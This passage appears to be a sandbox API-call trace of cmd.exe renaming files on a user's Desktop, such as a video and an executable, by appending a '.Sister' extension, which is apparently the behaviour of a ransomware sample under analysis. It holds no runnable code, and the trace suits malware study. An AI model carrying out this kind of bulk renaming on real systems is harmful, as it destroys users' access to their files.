_ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0140.581] _get_osfhandle (_FileHandle=1) returned 0x50 [0140.581] GetFileType (hFile=0x50) returned 0x2 [0140.581] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0140.582] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0140.583] _get_osfhandle (_FileHandle=1) returned 0x50 [0140.583] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0140.587] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe240, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0140.627] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0140.628] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0140.628] malloc (_Size=0xffce) returned 0x21ed90c0000 [0140.629] ??_V@YAXPEAX@Z () returned 0x21ed90c0000 [0140.630] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0140.630] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0140.630] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0140.630] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0140.630] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0140.630] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0140.630] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0140.630] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0140.630] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0140.630] ??_V@YAXPEAX@Z () returned 0x1 [0140.630] GetProcessHeap () returned 0x21ed8c70000 [0140.630] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xc0) returned 0x21ed92a03f0 [0140.630] GetProcessHeap () returned 0x21ed8c70000 [0140.630] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed92a03f0, Size=0x68) returned 0x21ed8cdd7c0 [0140.630] GetProcessHeap () returned 0x21ed8c70000 [0140.630] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8cdd7c0) returned 0x68 [0140.630] GetProcessHeap () returned 0x21ed8c70000 [0140.630] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x70) returned 0x21ed8cdd830 [0140.630] GetProcessHeap () returned 0x21ed8c70000 [0140.630] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xc0) returned 0x21ed92a08d0 [0140.630] GetProcessHeap () returned 0x21ed8c70000 [0140.630] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed92a08d0, Size=0x68) returned 0x21ed8cde000 [0140.630] GetProcessHeap () returned 0x21ed8c70000 [0140.630] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8cde000) returned 0x68 [0140.630] malloc (_Size=0xffce) returned 0x21ed90c0000 [0140.630] ??_V@YAXPEAX@Z () returned 0x21ed90c0000 [0140.630] GetProcessHeap () returned 0x21ed8c70000 [0140.630] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8d42cd0 [0140.631] GetProcessHeap () returned 0x21ed8c70000 [0140.631] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d319f0 [0140.631] _wcsicmp (_String1="45AyVVfixDb.avi", _String2=".") returned 6 [0140.631] _wcsicmp (_String1="45AyVVfixDb.avi", _String2="..") returned 6 [0140.631] GetFileAttributesW (lpFileName="45AyVVfixDb.avi" (normalized: "c:\\users\\fd1hvy\\desktop\\45ayvvfixdb.avi")) returned 0x20 [0140.631] GetProcessHeap () returned 0x21ed8c70000 [0140.631] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed92a1070 [0140.632] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed92a1080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0140.632] SetErrorMode (uMode=0x0) returned 0x0 [0140.632] SetErrorMode (uMode=0x1) returned 0x0 [0140.632] GetFullPathNameW (in: lpFileName="45AyVVfixDb.avi", nBufferLength=0x7fe7, lpBuffer=0x21ed90c0000, lpFilePart=0xa6cf4fd660 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\45AyVVfixDb.avi", lpFilePart=0xa6cf4fd660*="45AyVVfixDb.avi") returned 0x27 [0140.633] SetErrorMode (uMode=0x0) returned 0x1 [0140.633] GetProcessHeap () returned 0x21ed8c70000 [0140.633] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d308e0 [0140.633] _wcsicmp (_String1="45AyVVfixDb.avi", _String2=".") returned 6 [0140.633] _wcsicmp (_String1="45AyVVfixDb.avi", _String2="..") returned 6 [0140.633] GetFileAttributesW (lpFileName="45AyVVfixDb.avi" (normalized: "c:\\users\\fd1hvy\\desktop\\45ayvvfixdb.avi")) returned 0x20 [0140.633] ??_V@YAXPEAX@Z () returned 0x1 [0140.633] malloc (_Size=0xffce) returned 0x21ed90c0000 [0140.633] ??_V@YAXPEAX@Z () returned 0x21ed90c0000 [0140.633] malloc (_Size=0xffce) returned 0x21ed90cffe0 [0140.634] ??_V@YAXPEAX@Z () returned 0x21ed90cffe0 [0140.634] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\45AyVVfixDb.avi" (normalized: "c:\\users\\fd1hvy\\desktop\\45ayvvfixdb.avi")) returned 0x20 [0140.634] malloc (_Size=0xffce) returned 0x21ed90dffc0 [0140.634] ??_V@YAXPEAX@Z () returned 0x21ed90dffc0 [0140.635] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\45AyVVfixDb.avi", fInfoLevelId=0x1, lpFindFileData=0x21ed8d31a00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x21ed8d31a00) returned 0x21ed8d43570 [0140.635] malloc (_Size=0xffce) returned 0x21ed90effa0 [0140.635] ??_V@YAXPEAX@Z () returned 0x21ed90effa0 [0140.636] ??_V@YAXPEAX@Z () returned 0x1 [0140.636] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\45AyVVfixDb.avi" (normalized: "c:\\users\\fd1hvy\\desktop\\45ayvvfixdb.avi"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\45AyVVfixDb.avi.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\45ayvvfixdb.avi.sister"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0140.697] FindNextFileW (in: hFindFile=0x21ed8d43570, lpFindFileData=0x21ed8d31a00 | out: lpFindFileData=0x21ed8d31a00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4657f3a0, ftCreationTime.dwHighDateTime=0x1d5e322, ftLastAccessTime.dwLowDateTime=0x45ca9be0, ftLastAccessTime.dwHighDateTime=0x1d5e48f, ftLastWriteTime.dwLowDateTime=0x45ca9be0, ftLastWriteTime.dwHighDateTime=0x1d5e48f, nFileSizeHigh=0x0, nFileSizeLow=0x6ad4, dwReserved0=0x0, dwReserved1=0x0, cFileName="45AyVVfixDb.avi", cAlternateFileName="")) returned 0 [0140.698] GetLastError () returned 0x12 [0140.698] FindClose (in: hFindFile=0x21ed8d43570 | out: hFindFile=0x21ed8d43570) returned 1 [0140.698] ??_V@YAXPEAX@Z () returned 0x1 [0140.699] ??_V@YAXPEAX@Z () returned 0x1 [0140.700] ??_V@YAXPEAX@Z () returned 0x1 [0140.701] ??_V@YAXPEAX@Z () returned 0x1 [0140.701] GetProcessHeap () returned 0x21ed8c70000 [0140.701] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8d43870 [0140.701] GetProcessHeap () returned 0x21ed8c70000 [0140.701] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c957e0, Size=0x16) returned 0x21ed8c959a0 [0140.701] GetProcessHeap () returned 0x21ed8c70000 [0140.701] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c959a0) returned 0x16 [0140.701] GetProcessHeap () returned 0x21ed8c70000 [0140.701] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c7d330, Size=0x20) returned 0x21ed8c7d330 [0140.701] GetProcessHeap () returned 0x21ed8c70000 [0140.701] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c7d330) returned 0x20 [0140.701] GetProcessHeap () returned 0x21ed8c70000 [0140.701] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x150) returned 0x21ed8cde070 [0140.701] GetProcessHeap () returned 0x21ed8c70000 [0140.701] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8cde070, Size=0xb2) returned 0x21ed8cde070 [0140.701] GetProcessHeap () returned 0x21ed8c70000 [0140.701] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8cde070) returned 0xb2 [0140.701] GetProcessHeap () returned 0x21ed8c70000 [0140.701] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d597e0 [0140.701] GetProcessHeap () returned 0x21ed8c70000 [0140.701] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d597e0, Size=0x30) returned 0x21ed8d597e0 [0140.701] GetProcessHeap () returned 0x21ed8c70000 [0140.701] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d597e0) returned 0x30 [0140.701] GetProcessHeap () returned 0x21ed8c70000 [0140.701] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d59820 [0140.701] malloc (_Size=0x1ff9c) returned 0x21ed90c0000 [0140.704] GetProcessHeap () returned 0x21ed8c70000 [0140.704] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed8d47690 [0140.704] GetProcessHeap () returned 0x21ed8c70000 [0140.704] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xac) returned 0x21ed8d46e50 [0140.704] ??_V@YAXPEAX@Z () returned 0x1 [0140.707] malloc (_Size=0x1ff9c) returned 0x21ed90c0000 [0140.710] GetProcessHeap () returned 0x21ed8c70000 [0140.710] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed8d47450 [0140.710] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", nBufferLength=0xffce, lpBuffer=0x21ed90c0000, lpFilePart=0xa6cf4fdd08 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFilePart=0xa6cf4fdd08*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe") returned 0x4d [0140.710] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x1010, cFileName="Users", cAlternateFileName="")) returned 0x21ed8d42f10 [0140.710] FindClose (in: hFindFile=0x21ed8d42f10 | out: hFindFile=0x21ed8d42f10) returned 1 [0140.710] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x1010, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8d43750 [0140.710] FindClose (in: hFindFile=0x21ed8d43750 | out: hFindFile=0x21ed8d43750) returned 1 [0140.710] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x7e760687, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x7e760687, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x1010, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8d433f0 [0140.711] FindClose (in: hFindFile=0x21ed8d433f0 | out: hFindFile=0x21ed8d433f0) returned 1 [0140.711] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29182c00, ftCreationTime.dwHighDateTime=0x1d6141f, ftLastAccessTime.dwLowDateTime=0x29182c00, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x6a501200, ftLastWriteTime.dwHighDateTime=0x1d61406, nFileSizeHigh=0x0, nFileSizeLow=0x40800, dwReserved0=0x0, dwReserved1=0x1010, cFileName="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", cAlternateFileName="CUSERS~1.EXE")) returned 0x21ed8d42d90 [0140.711] FindClose (in: hFindFile=0x21ed8d42d90 | out: hFindFile=0x21ed8d42d90) returned 1 [0140.711] _wcsnicmp (_String1="CUSERS~1.EXE", _String2="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", _MaxCount=0x35) returned 22 [0140.711] malloc (_Size=0x1ff9c) returned 0x21ed90dffb0 [0140.711] ??_V@YAXPEAX@Z () returned 0x21ed90dffb0 [0140.712] GetProcessHeap () returned 0x21ed8c70000 [0140.712] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x74) returned 0x21ed8cde140 [0140.712] ??_V@YAXPEAX@Z () returned 0x1 [0140.712] ??_V@YAXPEAX@Z () returned 0x1 [0140.714] GetProcessHeap () returned 0x21ed8c70000 [0140.714] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d59820, Size=0x490) returned 0x21ed8d59820 [0140.714] GetProcessHeap () returned 0x21ed8c70000 [0140.714] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d59820) returned 0x490 [0140.714] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fddc8 | out: _Buffer="\r\n") returned 2 [0140.714] _get_osfhandle (_FileHandle=1) returned 0x50 [0140.714] GetFileType (hFile=0x50) returned 0x2 [0140.714] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0140.714] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd58 | out: lpMode=0xa6cf4fdd58) returned 1 [0140.725] _get_osfhandle (_FileHandle=1) returned 0x50 [0140.725] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fdd98, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fdd98*=0x2) returned 1 [0140.746] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0140.746] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fddd8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0140.747] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fddd8 | out: _Buffer=">") returned 1 [0140.747] _get_osfhandle (_FileHandle=1) returned 0x50 [0140.747] GetFileType (hFile=0x50) returned 0x2 [0140.747] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0140.747] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd88 | out: lpMode=0xa6cf4fdd88) returned 1 [0140.754] _get_osfhandle (_FileHandle=1) returned 0x50 [0140.754] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fddc8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fddc8*=0x18) returned 1 [0140.789] _get_osfhandle (_FileHandle=1) returned 0x50 [0140.789] GetFileType (hFile=0x50) returned 0x2 [0140.789] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0140.789] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0140.797] _get_osfhandle (_FileHandle=1) returned 0x50 [0140.797] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d597f0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x21ed8d597f0*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x3) returned 1 [0140.803] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe098 | out: _Buffer=" \"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister\" \"CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.bat\" ") returned 144 [0140.803] _get_osfhandle (_FileHandle=1) returned 0x50 [0140.803] GetFileType (hFile=0x50) returned 0x2 [0140.803] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0140.804] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe028 | out: lpMode=0xa6cf4fe028) returned 1 [0140.905] _get_osfhandle (_FileHandle=1) returned 0x50 [0140.905] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x90, lpNumberOfCharsWritten=0xa6cf4fe068, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe068*=0x90) returned 1 [0140.912] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe0c8 | out: _Buffer="\r\n") returned 2 [0140.912] _get_osfhandle (_FileHandle=1) returned 0x50 [0140.912] GetFileType (hFile=0x50) returned 0x2 [0140.913] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0140.913] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0140.914] _get_osfhandle (_FileHandle=1) returned 0x50 [0140.914] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x2) returned 1 [0140.920] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde10, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0140.921] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0140.922] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0140.922] malloc (_Size=0xffce) returned 0x21ed90c0000 [0140.924] ??_V@YAXPEAX@Z () returned 0x21ed90c0000 [0140.924] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0140.924] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0140.924] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0140.924] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0140.924] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0140.924] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0140.924] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0140.924] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0140.924] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0140.924] ??_V@YAXPEAX@Z () returned 0x1 [0140.924] GetProcessHeap () returned 0x21ed8c70000 [0140.924] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8cde1c0 [0140.925] GetProcessHeap () returned 0x21ed8c70000 [0140.925] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8cde1c0, Size=0x130) returned 0x21ed8cde1c0 [0140.925] GetProcessHeap () returned 0x21ed8c70000 [0140.925] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8cde1c0) returned 0x130 [0140.925] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0140.925] malloc (_Size=0xffce) returned 0x21ed90c0000 [0140.925] ??_V@YAXPEAX@Z () returned 0x21ed90c0000 [0140.925] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0140.925] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x21ed90c0000, nVolumeNameSize=0x7fe7, lpVolumeSerialNumber=0xa6cf4fd960, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xa6cf4fd960*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0140.930] ??_V@YAXPEAX@Z () returned 0x1 [0140.930] GetProcessHeap () returned 0x21ed8c70000 [0140.930] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x138) returned 0x21ed8cde300 [0140.930] GetProcessHeap () returned 0x21ed8c70000 [0140.930] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d43b10 [0140.930] GetProcessHeap () returned 0x21ed8c70000 [0140.930] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d43b10, Size=0x130) returned 0x21ed8d43b10 [0140.930] GetProcessHeap () returned 0x21ed8c70000 [0140.930] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d43b10) returned 0x130 [0140.930] malloc (_Size=0xffce) returned 0x21ed90c0000 [0140.930] ??_V@YAXPEAX@Z () returned 0x21ed90c0000 [0140.930] GetProcessHeap () returned 0x21ed8c70000 [0140.930] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8d43450 [0140.930] GetProcessHeap () returned 0x21ed8c70000 [0140.930] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d30dc0 [0140.930] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0140.930] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0140.930] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0140.931] GetLastError () returned 0x2 [0140.931] GetProcessHeap () returned 0x21ed8c70000 [0140.931] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed92b1060 [0140.931] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed92b1070 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0140.931] SetErrorMode (uMode=0x0) returned 0x0 [0140.931] SetErrorMode (uMode=0x1) returned 0x0 [0140.931] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", nBufferLength=0x7fe7, lpBuffer=0x21ed90c0000, lpFilePart=0xa6cf4fd230 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", lpFilePart=0xa6cf4fd230*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister") returned 0x54 [0140.931] SetErrorMode (uMode=0x0) returned 0x1 [0140.931] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0140.931] GetProcessHeap () returned 0x21ed8c70000 [0140.931] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d30b50 [0140.932] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0140.932] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0140.932] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0140.932] GetLastError () returned 0x2 [0140.932] ??_V@YAXPEAX@Z () returned 0x1 [0140.932] malloc (_Size=0xffce) returned 0x21ed90c0000 [0140.932] ??_V@YAXPEAX@Z () returned 0x21ed90c0000 [0140.932] malloc (_Size=0xffce) returned 0x21ed90cffe0 [0140.932] ??_V@YAXPEAX@Z () returned 0x21ed90cffe0 [0140.933] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0140.933] GetLastError () returned 0x2 [0140.933] _get_osfhandle (_FileHandle=2) returned 0x54 [0140.933] GetFileType (hFile=0x54) returned 0x2 [0140.933] GetStdHandle (nStdHandle=0xfffffff4) returned 0x54 [0140.933] GetConsoleMode (in: hConsoleHandle=0x54, lpMode=0xa6cf4fd378 | out: lpMode=0xa6cf4fd378) returned 1 [0140.936] _get_osfhandle (_FileHandle=2) returned 0x54 [0140.936] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x54, lpConsoleScreenBufferInfo=0xa6cf4fd3b0 | out: lpConsoleScreenBufferInfo=0xa6cf4fd3b0) returned 1 [0140.950] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0140.950] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0xa6cf4fd450 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0140.950] WriteConsoleW (in: hConsoleOutput=0x54, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0xa6cf4fd3a0, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fd3a0*=0x2c) returned 1 [0140.969] longjmp () [0140.969] ??_V@YAXPEAX@Z () returned 0x1 [0140.970] FindNextFileW (in: hFindFile=0x21ed8c7cac0, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x391bc3b0, 